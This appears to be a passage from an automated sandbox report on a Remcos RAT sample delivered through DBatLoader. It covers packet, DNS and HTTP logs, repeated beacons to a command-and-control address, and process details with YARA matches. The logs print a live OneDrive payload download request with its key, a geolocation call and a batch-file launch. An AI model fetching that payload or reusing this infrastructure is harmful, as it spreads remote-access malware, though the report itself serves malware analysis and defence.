                                                                                                                                                                  Apr 24, 2024 17:04:15.562601089 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.564014912 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.564023972 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.564807892 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:15.616220951 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.617784023 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:15.660157919 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006272078 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006468058 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006531954 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006702900 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006719112 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:16.006736040 CEST49737443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:16.006741047 CEST4434973713.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.747752905 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.747785091 CEST4434974413.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.747857094 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.747982979 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.748043060 CEST4434974413.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.748121977 CEST49744443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.763066053 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.763115883 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:20.763292074 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.764627934 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:20.764647961 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.314332008 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.314414024 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.319221020 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.319230080 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.320127010 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.362493038 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.379522085 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.420149088 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.718730927 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.718934059 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.719012976 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719114065 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719129086 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:21.719156981 CEST49745443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:04:21.719170094 CEST4434974513.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:23.315247059 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:23.316771984 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:23.690080881 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:53.302440882 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:53.303872108 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:53.674015045 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:23.314677000 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:23.317087889 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:05:23.688662052 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:53.314661026 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:53.317728043 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:05:53.689191103 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:05:54.040747881 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:54.946738005 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:56.540482998 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:05:59.759288073 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:06:05.931085110 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:06:18.134181976 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:06:23.314218044 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:06:23.316307068 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:06:23.688708067 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:06:42.540375948 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:06:53.326551914 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:06:53.329448938 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:06:53.700886011 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:07:23.330230951 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:07:23.335624933 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:07:23.716628075 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:07:53.342035055 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:07:53.347176075 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:07:53.716444969 CEST45084973391.223.3.151192.168.2.4

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Apr 24, 2024 17:03:57.649889946 CEST6332853192.168.2.41.1.1.1
                                                                                                                                                                  Apr 24, 2024 17:03:58.829994917 CEST5992353192.168.2.41.1.1.1
                                                                                                                                                                  Apr 24, 2024 17:04:04.066037893 CEST5582953192.168.2.41.1.1.1
                                                                                                                                                                  Apr 24, 2024 17:04:04.221340895 CEST53558291.1.1.1192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:14.863095999 CEST5071053192.168.2.41.1.1.1

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Apr 24, 2024 17:03:57.649889946 CEST192.168.2.41.1.1.10x3b1cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:58.829994917 CEST192.168.2.41.1.1.10x1a05Standard query (0)bnaqzw.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:04.066037893 CEST192.168.2.41.1.1.10x900eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:14.863095999 CEST192.168.2.41.1.1.10xd078Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Apr 24, 2024 17:03:57.803962946 CEST1.1.1.1192.168.2.40x3b1cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:57.803962946 CEST1.1.1.1192.168.2.40x3b1cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:57.803962946 CEST1.1.1.1192.168.2.40x3b1cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:57.803962946 CEST1.1.1.1192.168.2.40x3b1cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:57.803962946 CEST1.1.1.1192.168.2.40x3b1cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:59.071022034 CEST1.1.1.1192.168.2.40x1a05No error (0)bnaqzw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:03:59.071022034 CEST1.1.1.1192.168.2.40x1a05No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:04.221340895 CEST1.1.1.1192.168.2.40x900eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:15.017118931 CEST1.1.1.1192.168.2.40xd078No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:15.017118931 CEST1.1.1.1192.168.2.40xd078No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:15.017118931 CEST1.1.1.1192.168.2.40xd078No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:15.017118931 CEST1.1.1.1192.168.2.40xd078No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                  Apr 24, 2024 17:04:15.017118931 CEST1.1.1.1192.168.2.40xd078No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • onedrive.live.com
                                                                                                                                                                  • geoplugin.net

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.449735178.237.33.50807432C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Apr 24, 2024 17:04:04.533046007 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Apr 24, 2024 17:04:04.840662956 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                                  date: Wed, 24 Apr 2024 15:04:04 GMT
                                                                                                                                                                  server: Apache
                                                                                                                                                                  content-length: 965
                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.44973113.107.139.114437276C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-04-24 15:03:58 UTC213OUTGET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                  2024-04-24 15:03:58 UTC1166INHTTP/1.1 302 Found
                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Location: https://bnaqzw.sn.files.1drv.com/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k4jnss0SvX1GHudmpY3b2Ko_5uKuaUUDwo08rh0ZyymFW4tJ0HMl9nYObno2gsci-jbVL746XlPr58cb20XbPOGCtvpI5luDm4gYdw6YL3LA5UhYm-UXcPxnTVn9gUvhp7vL8UIwEI1Eh8N9SMSLuZCAxAw/xcvg?download&psid=1
                                                                                                                                                                  Set-Cookie: E=P:0kjUxG9k3Ig=:2bAZGFUfJhj2rylipK/SVRMaNu4XYG5pS7pUL3P+rio=:F; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xid=9fafd168-77c9-4a56-9d63-8ce5b5264b48&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:23:58 GMT; path=/
                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:03:58 GMT; path=/
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-jp754
                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 3F1A6D1A0396430E919C307AA512FE51 Ref B: BY3EDGE0411 Ref C: 2024-04-24T15:03:58Z
                                                                                                                                                                  Date: Wed, 24 Apr 2024 15:03:58 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.44973713.107.139.114437636C:\Users\Public\Libraries\Wagotghl.PIF
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-04-24 15:04:15 UTC213OUTGET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                  2024-04-24 15:04:16 UTC1166INHTTP/1.1 302 Found
                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Location: https://bnaqzw.sn.files.1drv.com/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_SdW3EeQr6Iz1lcIbmV3BYkQFFPfVvKC6HmRG-KKvN8Xlu2IHLi-nq3UHcEHCR3KwZiPB200DcWr4xIyPfez8CddxZYcHrLCksFQLZm5SJ5vHCtWw0QZfrvPZ6bonmYBeZxBq_4iiqITFpRmylsmkHhd7RbDQ/xcvg?download&psid=1
                                                                                                                                                                  Set-Cookie: E=P:AQMIz29k3Ig=:0hkvQtZguoRCh1oMTDkt+32MLCC+i1Bq/pmXMF27G1U=:F; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xid=5c99bfc8-b29d-4f0e-9aa2-1667cf47babb&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:24:15 GMT; path=/
                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:04:15 GMT; path=/
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-2lbqt
                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: E5E63D73C7F24929B7A0C692536197A8 Ref B: BY3EDGE0518 Ref C: 2024-04-24T15:04:15Z
                                                                                                                                                                  Date: Wed, 24 Apr 2024 15:04:15 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.44974513.107.139.114437916C:\Users\Public\Libraries\Wagotghl.PIF
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-04-24 15:04:21 UTC213OUTGET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                  2024-04-24 15:04:21 UTC1166INHTTP/1.1 302 Found
                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Location: https://bnaqzw.sn.files.1drv.com/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHiUlu4t3LbUGXPdoCVTrrDjyx798ZxqZZ3LRBtTXmNYels_IwCFqoSqj1G2heKH5qguAlX-Ahwog92AXVXXG0fQTtMvt9bXDMv59GswXOY06vGxR6YGcSpXpbZ3rQSPUn5wYfNv5lhuI_QV20s3PJQIDOwg/xcvg?download&psid=1
                                                                                                                                                                  Set-Cookie: E=P:kwF20m9k3Ig=:UFFXKO7gZrG0QvRFnpdGY/gkVGoDVahbkK6yQixcl4k=:F; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xid=d80356eb-4a83-44c4-b190-a2fd7e62f077&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 13:24:21 GMT; path=/
                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 15:04:21 GMT; path=/
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-wbqlh
                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 3A33CBB3AF20497B95CF5394E5FB0E59 Ref B: BY3EDGE0206 Ref C: 2024-04-24T15:04:21Z
                                                                                                                                                                  Date: Wed, 24 Apr 2024 15:04:21 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:17:03:56
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SHEOrder-10524.exe"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:1'646'592 bytes
                                                                                                                                                                  MD5 hash:439F6DB2ADB770A0F825879C91DA9904
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1719936963.0000000002315000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:17:04:00
                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
